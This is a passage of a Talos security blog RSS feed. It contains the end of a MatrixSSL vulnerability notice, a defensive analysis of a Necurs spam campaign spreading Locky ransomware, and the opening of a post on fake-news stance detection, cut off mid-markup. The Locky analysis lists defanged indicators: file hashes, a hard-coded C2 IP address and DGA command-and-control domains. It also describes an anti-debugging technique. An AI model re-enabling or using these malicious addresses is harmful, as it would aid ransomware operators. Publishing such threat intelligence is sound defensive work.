applied as quickly as possible. Ensuring that systems remained patched against the latest software vulnerabilities is essential to ensuring that environments remain protected. The latest version of this software package is available &lt;a href="https://github.com/matrixssl/matrixssl/releases/tag/3-9-3-open"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;For full details regarding these vulnerabilities, please see the advisories &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0276/"&gt;here&lt;/a&gt;, &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0277/"&gt;here&lt;/a&gt; and &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0278/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Research efforts to identify zero-day vulnerabilities in software will remain an ongoing effort by Talos. Our work in developing programmatic methods to identify zero-day vulnerabilities and making sure they are addressed in a responsible manner is critical to improving the overall security of the internet.&lt;br /&gt;&lt;br /&gt;Our vulnerability reporting and disclosure policy can be found &lt;a href="http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;The following Snort IDs have been released to detect these vulnerabilities: 41466, 41467 &lt;br /&gt;&lt;br /&gt;Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;For further zero day or vulnerability reports and information visit:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://talosintelligence.com/vulnerability-reports/"&gt;http://talosintelligence.com/vulnerability-reports/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=QAa9jYAi7gA:Du45oB4dyBc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/QAa9jYAi7gA" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-22T13:37:31.868-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/matrixssl-multiple-vulns.html</feedburner:origLink></item><item><title>Player 1 Limps Back Into the Ring - Hello again, Locky!</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/SX_JomJXrSM/necurs-locky-campaign.html</link><category>Coverage</category><category>Locky</category><category>Malware</category><category>Necurs</category><category>ransomware</category><category>spam</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Wed, 21 Jun 2017 14:00:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-4633531550065695361</guid><description>&lt;i&gt;This post was authored by &lt;a href="https://www.blogger.com/profile/09794908020114943712"&gt;Alex Chiu&lt;/a&gt;, &lt;a href="https://blogs.cisco.com/author/warrenmercer"&gt;Warren Mercer&lt;/a&gt;, and &lt;a href="https://twitter.com/jaesonschultz"&gt;Jaeson Schultz&lt;/a&gt;.&amp;nbsp; &lt;a href="https://www.linkedin.com/in/seanrichardbaird/"&gt;Sean Baird&lt;/a&gt; and &lt;a href="https://blogs.cisco.com/author/matthewmolyett"&gt;Matthew Molyett&lt;/a&gt; contributed to this post.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Back in May, the Necurs spam botnet jettisoned Locky ransomware in favor of the new Jaff ransomware variant. However, earlier this month Kaspersky &lt;a href="https://www.bleepingcomputer.com/news/security/decrypted-kaspersky-releases-decryptor-for-the-jaff-ransomware/"&gt;discovered&lt;/a&gt; a vulnerability within Jaff which allowed them to create a decryptor. This turn of events seems to have caused the miscreants behind Necurs to scramble to distribute a different ransomware payload. Falling back on their old tricks, they have selected to re-distribute Locky ransomware. The malware is being transmitted via email using an .exe file encapsulated within two compressed .zip archives. &lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.z8rebvtqlj19"&gt;The Spam Campaign&lt;/h2&gt;The spam that is distributing this ransomware campaign is not significantly different from other ransomware spam campaigns that &lt;a href="http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"&gt;we have seen&lt;/a&gt; from Necurs. Ransomware-oriented spam campaigns from Necurs typically involve order confirmations, payment receipts, business documents, and so on -- all with the common goal of social engineering victims into opening the attachment. The messages Talos observed in this particular campaign are disguised as fake invoices.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="334" data-original-width="584" height="366" src="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;An example spam message propagating Locky ransomware&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;a name='more'&gt;&lt;/a&gt;The volume of Locky spam Necurs has sent since the start of this particular campaign is notable. In the first hour of this campaign, Talos observed that Locky spam accounted for up to 7.2% of email volume on one of our systems. While the campaign has since decreased in the number of messages being sent per minute, Necurs is still actively sending messages containing Locky, though only in small quantities.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-O9IsDuPG5CQ/WUrZvGUQC2I/AAAAAAAABGU/xd8ggmw2doQ7iK2tb_5ztyE62QP4DqvegCLcBGAs/s1600/image3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="688" data-original-width="1459" height="300" src="https://1.bp.blogspot.com/-O9IsDuPG5CQ/WUrZvGUQC2I/AAAAAAAABGU/xd8ggmw2doQ7iK2tb_5ztyE62QP4DqvegCLcBGAs/s640/image3.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Chart illustrating the volume of Locky spam as a percent of total email volume one of our systems observed.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;h2 id="h.zcvqzzvyh9t2"&gt;Locky's Metamorphosis&lt;/h2&gt;&lt;br /&gt;Although they are using the same affiliate ID, for this particular round of Locky, the attackers have altered their ransomware. We were unable to get the ransomware to encrypt data on any systems running an operating system more recent than Windows XP. Upon further investigation, we determined that on systems running Windows 7 or later with Data Execution Prevention (DEP) would cause the unpacker to fail. Our analysis suggests that Locky has now added anti-debugging protection to their configuration. Instead of unpacking the configuration, when a debugger is detected their config pointer is directed at kernel32!AllocConsole, frustrating any attempts at analysis. In response to this new anti-analysis technique, Talos has updated &lt;a href="https://www.talosintelligence.com/lockydump"&gt;LockyDump&lt;/a&gt; so that it is able to extract the configuration information from this latest iteration.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-IO66iRUAo7Y/WUrZ4FmnYjI/AAAAAAAABGY/7fRBMyeOi8cz2CLZaNHTtO6-oEoyiWtUgCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="401" data-original-width="647" height="396" src="https://2.bp.blogspot.com/-IO66iRUAo7Y/WUrZ4FmnYjI/AAAAAAAABGY/7fRBMyeOi8cz2CLZaNHTtO6-oEoyiWtUgCLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Locky's unpacker crashes when trying to execute stack memory on systems more recent than Windows XP.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Another notable aspect of this latest campaign was the C2 URL structure. Adversaries behind this latest Locky campaign have reused the /checkupdate path as part of the URL structure -- the same URL structure found in &lt;a href="http://blog.talosintelligence.com/2017/04/locky-returns-necurs.html"&gt;previous&lt;/a&gt; Locky campaigns. This is perhaps another indication that adversaries were hasty in their developing and distributing this campaign.&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-MA9D-Bh1-lg/WUrZ9bg40jI/AAAAAAAABGc/_6xzKOgRZ7MbQ0C0GYGn8g8KCz287zZjQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="496" data-original-width="1600" height="198" src="https://1.bp.blogspot.com/-MA9D-Bh1-lg/WUrZ9bg40jI/AAAAAAAABGc/_6xzKOgRZ7MbQ0C0GYGn8g8KCz287zZjQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Threat Grid sandbox run illustrating Locky C2 communication&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;h2 id="h.78ghl21h9l72"&gt;Conclusion&lt;/h2&gt;&lt;br /&gt;This updated version of Locky appears to have been hastily deployed, and as a result it has not affected users running Windows operating systems other than Windows XP. The attackers behind this ransomware are likely already aware of this, so we can expect a fixed version of Locky to appear in a future round of Necurs' ransomware spam.&lt;br /&gt;&lt;br /&gt;Despite sounding like a broken record, we at Talos feel it's our duty to re-iterate that it's always risky clicking on links or opening attachments in strange email messages. Users that fail to heed this advice can easily become ransomware victims, and if the subsequent ransom is paid, the monies will no doubt fund another round of attacks. As always, organizations are encouraged to make regular backups of their data, practice restoring said data, and store your backups offline far out of the reach of potential criminals.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.a3tev2st7301"&gt;Coverage&lt;/h2&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on &lt;a href="https://www.snort.org/products"&gt;Snort.org&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-DHxZuOufEQc/WUraFLo0hiI/AAAAAAAABGg/Foaf5PPcddAqVgWF22XPw57vOihWGoxygCLcBGAs/s1600/image5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1341" data-original-width="1600" height="267" src="https://2.bp.blogspot.com/-DHxZuOufEQc/WUraFLo0hiI/AAAAAAAABGg/Foaf5PPcddAqVgWF22XPw57vOihWGoxygCLcBGAs/s320/image5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt;, and &lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; can help identify hosts that have been compromised by Locky by detecting outbound C2 traffic.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by threat actors as part of their campaign. &lt;br /&gt;&lt;br /&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; with Advanced Security can detect malicious activity associated with this threat.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html"&gt;Stealthwatch&lt;/a&gt; detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.j7hdlx7kfxn9"&gt;IOCs&lt;/h2&gt;&lt;br /&gt;&lt;b&gt;SHA256&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8&lt;/li&gt;&lt;li&gt;3285c3f37aa192a173f62fee82f7a966a6df6e5db4642d63a6784f39a63012b6&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Extension for Files Encrypted by Locky&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;.loptr&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;Hard-coded Locky C2 URL&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;hxxp://185.115.140[.]170/checkupdate&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Locky DGA C2s (20th/21st June - DGA seed 65123) &lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;hxxp://emtsgdqsik[.]pl/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://tqathwvfaqfisj[.]pl/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://dqutujymgc[.]info/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://ddgtdcgoysuq[.]ru/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://lrsjplrlaceugxw[.]work/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://cstfxgujaf[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://gcbdwbtshl[.]xyz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://wxcjqfevrkosp[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://hllfhiqwneuwwx[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://agnfmqvhomsa[.]work/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://ythjvjhtgsfgesd[.]biz/checkupdate&lt;/li&gt;&lt;li&gt;hxxp://kabssqyef[.]info/checkupdate&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=SX_JomJXrSM:x_Y2khEzZ-g:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/SX_JomJXrSM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-22T12:05:37.440-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-eyNiK605aRM/WUrZl2M0HkI/AAAAAAAABGQ/qwl28puJ1mcFIcja7euYAQG9YTqlqTQ5wCLcBGAs/s72-c/image2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html</feedburner:origLink></item><item><title>Talos Targets Disinformation with Fake News Challenge Victory</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/FtoD2o9EqnI/talos-fake-news-challenge.html</link><category>AI</category><category>artificial intelligence</category><category>data science</category><category>decision trees</category><category>deep learning</category><category>disinformation</category><category>fake news</category><category>false news</category><category>FNC</category><category>GBDT</category><category>machine learning</category><category>Neural Network</category><category>SOLAT IN THE SWEN</category><category>stance detection</category><category>Talos</category><category>Talos GitHub</category><author>noreply@blogger.com (William Largent)</author><pubDate>Tue, 20 Jun 2017 10:22:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-1322842482458115714</guid><description>This post was authored by&amp;nbsp;&lt;a href="https://www.linkedin.com/in/seanrichardbaird/" target="_blank"&gt;Sean Baird&lt;/a&gt; with contributions by Doug Sibley and &lt;a href="https://www.linkedin.com/in/yuxipanucla/" target="_blank"&gt;Yuxi Pan&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;For the past several months, the problem of “fake news” has been abuzz in news headlines, tweets, and social media posts across the web. With historical roots in information warfare and disinformation, “fake news” is a different kind of cyber-threat affecting people all around the globe. Using advanced machine learning and artificial intelligence technology, Talos researchers set their sights on this different kind of cyber-threat and beat out over 80 registered teams worldwide to claim first place in the &lt;a href="http://www.fakenewschallenge.org/" target="_blank"&gt;Fake News Challenge&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s1600/TalosInTheNews1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://1.bp.blogspot.com/-fXzLj0mZDLs/WUlByfuNujI/AAAAAAAAAPA/RpwB6P67lCwNkGBhuEeCMuqvpD0G5kRGACLcBGAs/s640/TalosInTheNews1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;&lt;a name='more'&gt;&lt;/a&gt;Context&lt;/h2&gt;&lt;br /&gt;&lt;h4&gt;Background&lt;/h4&gt;&lt;br /&gt;While there has been significant media coverage regarding fake news in the recent months, the modern fake news problem is rooted in a long history of information operations and disinformation campaigns.&lt;br /&gt;&lt;br /&gt;In a very in-depth &lt;a href="https://fbnewsroomus.files.wordpress.com/2017/04/facebook-and-information-operations-v1.pdf" target="_blank"&gt;paper&lt;/a&gt; about the topic, Facebook defines information operations “[...] as actions taken by organized actors...to distort domestic or foreign political sentiment, most frequently to achieve a strategic and/or geopolitical outcome [...]” and classifies “false news” as a useful tool in the information operations toolkit. &amp;nbsp;The paper specifies that “false news” is &amp;nbsp;“[...] news articles that purport to be factual, but which contain intentional misstatements of fact with the intention to arouse passions, attract viewership, or deceive.”&lt;br /&gt;&lt;br /&gt;Alternately, the &lt;a href="https://www.wired.com/story/fake-news-challenge-artificial-intelligence/" target="_blank"&gt;Wired article announcing the victory&lt;/a&gt; describes fake news in a simpler manner as “[...] made-up news stories created to convert social media shares into page views, ad dollars, and perhaps even political traction.”&lt;br /&gt;&lt;br /&gt;Clearly, this is a difficult problem to solve in cyberspace, especially in a world where technology and social media can help amplify these stories to a much broader audience. &amp;nbsp;This prompted several researchers in academia and industry to create the &lt;a href="http://www.fakenewschallenge.org/" target="_blank"&gt;Fake News Challenge (FNC&lt;/a&gt;). &amp;nbsp;The self described goal of the FNC is to “[...] address the problem of fake news by organizing a competition to foster development of tools to help human fact checkers identify hoaxes and deliberate misinformation in news stories.” &lt;br /&gt;&lt;br /&gt;The first iteration of the challenge (FNC-1), which lasted from December 1, 2016 until June 2, 2017 focused solely on stance detection, a crucial first step in helping to detect fake news.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;FNC-1: Stance Detection&lt;/h4&gt;&lt;br /&gt;While actual truth-labeling is a hefty task, rife with political and technical issues, stance detection is a potential first step toward a more robust solution. &amp;nbsp;&lt;a href="https://twitter.com/deanpomerleau" target="_blank"&gt;Dean Pomerleau&lt;/a&gt;, one of the organizers of the challenge, explained in a &lt;a href="http://mediashift.org/2017/05/fake-news-challenge-puts-ai-test/" target="_blank"&gt;Mediashift interview&lt;/a&gt; that “[...] the goal [of stance detection] is to determine which has the best argument, not just which is the most popular or widely cited or read, the way a search engine does.”&lt;br /&gt;&lt;br /&gt;In the context of the FNC, stance detection can be defined as labeling the relationship an article body has to its headline/claim -- specifically, whether the body agrees with, disagrees with, or discusses the headline/claim or whether the body is completely unrelated. &amp;nbsp;Thus, the four possible outputs of a stance detection system should be “agree,” “disagree,” “discuss,” and “unrelated.” &amp;nbsp;An example of how stance detection could be implemented in a broader fake news detection system is available in the figure below:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-zhHTanVkyPY/WUlCGou3mmI/AAAAAAAAAPE/3WUSmliCWPQgv3yEi4Q2PUWhrBDrsngmgCLcBGAs/s1600/news_outets_dark2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="878" data-original-width="1600" height="350" src="https://2.bp.blogspot.com/-zhHTanVkyPY/WUlCGou3mmI/AAAAAAAAAPE/3WUSmliCWPQgv3yEi4Q2PUWhrBDrsngmgCLcBGAs/s640/news_outets_dark2.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Stance detection’s role in fake news detection&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Always interested in a challenge, the FNC piqued the interest of Talos researchers who chose the team name “SOLAT IN THE SWEN” as a clever anagram of their true affiliation. &amp;nbsp;Immediately, these researchers began development work on various models and solutions in their spare time -- models which would eventually net them a first place victory.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-hyzMJ3b0Sek/WUlZGUPPh6I/AAAAAAAAAQM/KwYQmxOjlg8xNTIsYZBrZD3mClaONm-GQCLcBGAs/s1600/talos-in-the-news_blog-bg3.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="150" data-original-width="830" height="114" src="https://3.bp.blogspot.com/-hyzMJ3b0Sek/WUlZGUPPh6I/AAAAAAAAAQM/KwYQmxOjlg8xNTIsYZBrZD3mClaONm-GQCLcBGAs/s640/talos-in-the-news_blog-bg3.gif" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small;"&gt;SOLAT IN THE SWEN - Talos’s covert team name&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;Our Solution&lt;/h2&gt;&lt;br /&gt;One of the goals of this challenge was “[...] to explore how artificial intelligence technologies, particularly machine learning and natural language processing, might be leveraged to combat the fake news problem [...].” Because of this, team SOLAT IN THE SWEN decided to test how various cutting-edge machine learning techniques performed. &amp;nbsp;After successfully implementing several different models, the team found that their results were best when combining multiple models in an ensemble. &amp;nbsp;The team’s final submission was an ensemble based on an 50/50 weighted average between gradient-boosted decision trees and a deep convolutional neural network. &amp;nbsp;The full code can be found on the &lt;a href="https://github.com/Cisco-Talos/fnc-1/" target="_blank"&gt;Talos GitHub&lt;/a&gt;, open sourced with an Apache 2.0 license.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-W6Xph2kiuNo/WUlCa4y9C9I/AAAAAAAAAPM/LIHm718lW6YnPS3VGNzPZy3Lp5Ycr7jMQCLcBGAs/s1600/final_prediction_dark4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1021" data-original-width="1194" height="341" src="https://2.bp.blogspot.com/-W6Xph2kiuNo/WUlCa4y9C9I/AAAAAAAAAPM/LIHm718lW6YnPS3VGNzPZy3Lp5Ycr7jMQCLcBGAs/s400/final_prediction_dark4.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Our models were ensembled with a 50/50 weighted average&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Deep Learning Approach&lt;/h4&gt;&lt;br /&gt;The first model used by the team applies several different neural networks used in deep learning. &amp;nbsp;This model applies a one-dimensional &lt;a href="https://en.wikipedia.org/wiki/Convolution" target="_blank"&gt;convolutional&lt;/a&gt; neural net (&lt;a href="https://en.wikipedia.org/wiki/Convolutional_neural_network" target="_blank"&gt;CNN&lt;/a&gt;) on the headline and body text, represented at the word level using the Google News pretrained &lt;a href="https://code.google.com/archive/p/word2vec/" target="_blank"&gt;vectors&lt;/a&gt;. CNNs allow for efficient, effective parallel computation while performing The output of this CNN is then sent to an multi-layer perceptron (&lt;a href="https://en.wikipedia.org/wiki/Multilayer_perceptron" target="_blank"&gt;MLP&lt;/a&gt;) with 4-class output -- “agree,” “disagree,” “discuss,” and “unrelated” -- and trained end-to-end. The model was regularized using dropout (p=.5) in all convolutional layers. All hyperparameters of this model were set to sensible defaults, however, they were not further evaluated to find better choices.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-DkBKbpVM4w4/WUlCiFEVKTI/AAAAAAAAAPQ/NORk5w4GbS01iSLD1sCcrIlifuGNwvnUgCEwYBhgL/s1600/deep_model_dark5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1600" data-original-width="1440" height="640" src="https://1.bp.blogspot.com/-DkBKbpVM4w4/WUlCiFEVKTI/AAAAAAAAAPQ/NORk5w4GbS01iSLD1sCcrIlifuGNwvnUgCEwYBhgL/s640/deep_model_dark5.png" width="574" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;Diagram outlining our deep learning model&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;The architecture of this model was selected due to its ease of implementation and fast computation since we can rely on convolutions instead of recurrence. Judging from the relative strength of this model convolutions seem to be able to capture a wide variety of topics; however, the model is limited in that it only gets to observe the text once. A potential extension to this model would be to include some sort of attention mechanism with recurrence after the convolutions which would allow the model query specific aspects of the headline/body after receiving a general summary from the CNN.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Gradient-Boosted Decision Trees (GBDT) Approach&lt;/h4&gt;&lt;br /&gt;The other model employed in the ensemble is a Gradient-Boosted Decision Trees (&lt;a href="https://en.wikipedia.org/wiki/Gradient_boosting" target="_blank"&gt;GBDT&lt;/a&gt;) model. This model inputs few text-based features derived from the headline and body of an article, which are then fed into Gradient Boosted Trees to predict the relation between the headline and the body.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a 